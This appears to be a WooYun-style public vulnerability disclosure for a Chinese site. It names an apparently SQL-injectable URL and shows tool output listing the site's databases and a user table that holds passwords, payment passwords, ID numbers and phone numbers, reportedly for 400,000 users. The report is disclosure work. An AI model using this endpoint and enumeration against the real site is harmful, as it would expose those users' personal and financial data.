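2016-04-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-05-21: The vendor has actively ignored the vulnerability; details disclosed to the public.
As the title says.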
http://wap.5262.com/index/notice?action=list&mstatus=1
available databases [9]:
[*] accounts_data
[*] billstable_data
[*] borrow_data
[*] gome_data
[*] log_data
[*] members_data
[*] order_data
[*] queue_data
[*] test
Database: members_data
Table: data_users
[53 columns]
+------------------+-----------------------+
| Column           | Type                  |
+------------------+-----------------------+
| agent_reg        | tinyint(1)            |
| auth_time        | int(10)               |
| becomeManageTime | int(11)               |
| bmz              | varchar(10)           |
| bumeng           | varchar(8)            |
| city             | varchar(20)           |
| email            | varchar(30)           |
| freezeMoney      | varchar(60)           |
| from_weixin      | char(6)               |
| fundStatus       | tinyint(1)            |
| hash             | varchar(32)           |
| IDcardNo         | varchar(30)           |
| imei             | varchar(50)           |
| income           | float(11,2)           |
| is_legal         | tinyint(1)            |
| isEmail          | tinyint(1)            |
| isexport         | tinyint(1)            |
| isgree           | tinyint(1)            |
| isLock           | tinyint(2)            |
| isManages        | tinyint(2)            |
| isMobile         | tinyint(1)            |
| ismzf            | tinyint(4)            |
| isPass           | tinyint(1)            |
| jgid             | int(11)               |
| lastloginDate    | int(11)               |
| loginNum         | int(11)               |
| manageDate       | int(11)               |
| mobile           | varchar(11)           |
| money            | float(11,2)           |
| moneyLock        | tinyint(2)            |
| myGroupID        | varchar(20)           |
| myIntoID         | int(11)               |
| myManageID       | int(11)               |
| myMoney          | varchar(100)          |
| passWord         | varchar(32)           |
| payPassWord      | varchar(32)           |
| platform         | int(11)               |
| preloginDate     | int(11)               |
| prov             | varchar(20)           |
| qrimage          | varchar(200)          |
| rank             | tinyint(2)            |
| realName         | varchar(30)           |
| regip            | varchar(50)           |
| regTime          | int(11)               |
| sourceId         | varchar(100)          |
| terminal         | tinyint(4)            |
| topRecommend     | int(11)               |
| userform         | tinyint(1)            |
| userid           | int(11)               |
| userName         | varchar(30)           |
| userSource       | varchar(30)           |
| userType         | enum('1','2','3','4') |
| weixin_uid       | varchar(32)           |
+------------------+-----------------------+
Sensitive information of 400,000 users leaked.
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)